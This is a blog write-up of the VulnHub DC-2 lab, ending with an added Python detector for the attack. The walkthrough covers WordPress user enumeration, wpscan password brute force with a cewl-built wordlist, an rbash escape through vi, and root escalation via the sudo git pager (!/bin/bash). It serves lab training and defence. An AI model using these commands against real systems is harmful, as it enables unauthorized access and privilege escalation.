[Try to Hack] vulnhub DC2
2022-06-29 14:40:00 [Happy star]
Blog home page: Happy star's blog home page
Series column: Try to Hack
Started: June 29, 2022
The author's level is very limited; if you find an error, please let me know, thanks!
Target machine knowledge points:
1. hosts file
2. dirb directory scanning
3. wpscan user name enumeration
4. cewl password crawling
5. ssh service login
6. rbash escape
7. git privilege escalation

First, bridged mode.
Note that this lab does not use a static IP; 192.168.0.145 is just an example to show how to set up the hosts file.
Download the target as usual; it defaults to bridged mode.
No need to change it.
The Kali attacker is also set to bridged mode (that is how I did it).
netdiscover host discovery
Because the target may not be in the same network segment as our Kali, and arp-scan -l can only scan hosts in the same segment as Kali.
This is our target, because the vendor is VMware, Inc.
Port scanning: nmap -sV -p- 192.168.0.131
Port 80 is open; visit 192.168.0.131
This is the result.
According to the description at the start of the challenge, go set up hosts: vim /etc/hosts

Visit succeeded.
It prompts us to use cewl. whatweb 192.168.0.131
It is WordPress.
dirb http://192.168.0.131
Directory scanning
http://192.168.0.131/wp-admin/
This may be the admin back end; visit it.
It is indeed; an account and password are required.
Now let's use cewl.
Crawl the website content and generate a dictionary:
cewl dc-2 > dc-2.txt
This is the password dictionary.
We use wpscan to get user names: wpscan --url http://dc-2 -e u

Save them as user.txt
wpscan --url http://dc-2 --usernames user.txt --passwords dc-2.txt
Using Burp Suite (bp) also works.
Log in as jerry and just look around.

It reminds us not to use a WordPress vulnerability.

I thought I could write a shell.
Log in over ssh with the two accounts and passwords:
ssh -p 7744 tom@192.168.0.131
ssh -p 7744 jerry@192.168.0.131

Logged in, and also found flag3.
But the commands to read the file are banned.
See what commands can be used:
echo $PATH
echo /home/tom/usr/bin/*

vi flag3.txt
I saw the flag.
Reading the writeup, I understood: switch from the tom user to jerry.
Need to use su.

rbash escape
rbash differs from a general shell in that it restricts some behaviors, making some commands impossible to execute.
[Penetration testing] brief description of rbash escape methods
In vi you can point the shell at /bin/bash. Open vi:
Type :set shell=/bin/sh
Then type :shell
You get a shell.
After the switch is complete, add environment variables. Add two paths to the $PATH variable, used to find commands:
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/

Success.
Look for the flag.
Hint: git
git privilege escalation
Method 1:
sudo git help config
!/bin/bash or !'sh'
Method 2:
sudo git -p help
!/bin/bash
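As an added defender-side example (not part of the original writeup), the following Python flags the two sudo git invocations above when they appear in sudo's auth.log entries, and lists sudoers rules that grant git to a user so they can be fixed before being abused. The log lines and the sudoers fragment are constructed for this example; the VM's real sudoers rule is not shown on the page and is assumed.

```python
import re

# Constructed sample in the format sudo writes to /var/log/auth.log
# (hostname, users and commands are made up for this example).
SAMPLE_AUTH_LOG = """\
Jun 29 14:40:01 DC-2 sudo:    jerry : TTY=pts/0 ; PWD=/home/jerry ; USER=root ; COMMAND=/usr/bin/git help config
Jun 29 14:40:09 DC-2 sudo:    jerry : TTY=pts/0 ; PWD=/home/jerry ; USER=root ; COMMAND=/usr/bin/git -p help
Jun 29 14:41:30 DC-2 sudo:    jerry : TTY=pts/0 ; PWD=/srv/repo ; USER=root ; COMMAND=/usr/bin/git status
Jun 29 14:42:00 DC-2 sudo:    admin : TTY=pts/1 ; PWD=/root ; USER=root ; COMMAND=/usr/bin/apt update
"""

# Constructed sudoers fragment (assumed; the writeup does not show the VM's rule).
SAMPLE_SUDOERS = """\
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
jerry   ALL=(root) NOPASSWD: /usr/bin/git
"""

SUDO_LOG_RE = re.compile(
    r"sudo:\s+(?P<user>\S+) : .*?USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.*)$")
SUDOERS_RE = re.compile(
    r"^(?P<user>\S+)\s+\S+\s*=\s*(?:\([^)]*\)\s*)?(?:[A-Z_]+:\s*)*(?P<cmds>.+)$")

def pager_spawning_git(argv):
    """True for the two forms in the writeup: `git help <topic>` (man page in a
    pager) and `git -p ...` (forced pagination); `!` in the pager runs commands."""
    if not argv or argv[0].rsplit("/", 1)[-1] != "git":
        return False
    return any(a in ("help", "-p", "--paginate") for a in argv[1:])

def find_sudo_pager_escapes(log_text):
    """Return (invoking user, target user, command) for matching sudo entries."""
    hits = []
    for line in log_text.splitlines():
        m = SUDO_LOG_RE.search(line)
        if m and pager_spawning_git(m.group("cmd").split()):
            hits.append((m.group("user"), m.group("target"), m.group("cmd")))
    return hits

def git_sudo_rules(sudoers_text):
    """Return (user, command) for sudoers rules that grant git to a user."""
    rules = []
    for line in sudoers_text.splitlines():
        m = SUDOERS_RE.match(line.strip())
        if not m or m.group("user") == "Defaults":
            continue
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            if cmd and cmd.split()[0].rsplit("/", 1)[-1] == "git":
                rules.append((m.group("user"), cmd))
    return rules
```

Run `find_sudo_pager_escapes` over the real auth.log to spot the escape after the fact, and `git_sudo_rules` over `/etc/sudoers` to remove or tighten the rule that makes it possible.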
